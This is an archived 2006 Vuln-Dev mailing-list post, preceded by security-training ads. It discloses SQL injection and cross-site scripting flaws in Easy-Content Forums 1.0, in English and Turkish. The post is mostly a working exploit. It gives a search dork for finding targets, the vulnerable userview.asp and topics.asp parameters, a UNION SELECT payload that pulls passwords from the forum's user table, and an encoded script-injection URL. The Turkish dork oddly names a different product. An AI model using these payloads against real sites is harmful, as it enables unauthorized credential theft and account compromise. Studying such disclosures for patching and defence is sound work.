Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities

Subject: Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities
Date: 23 May 2006 18:39:57 -0000
ENGLISH

# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork   :   "Copyright 2004 easy-content forums"

# Author :   ajann

# Exploit;

SQL INJECTİON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL TEXT

###  http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 
union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=xss TEXT

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X


# ajann,Turkey


TURKISH

# Başlık          :   Easy-Content Forums 1.0 Multiple SQL/XSS 
Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Açığı Bulan     :   ajann
# Açık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ 
=>catid=Değişken

Örnek:

http://[target]/[path]/topics.asp?catid=1 
union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X 
uyarısı çıkarıcaktır.


Açıklama: 
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği 
nedeniyle sql sorgu çalıştırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği 
nedeniyle xss kodları çalışabilmektedir.

# ajann,Turkiye

<Prev in Thread] Current Thread [Next in Thread>
  • Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities, ajannhwt <=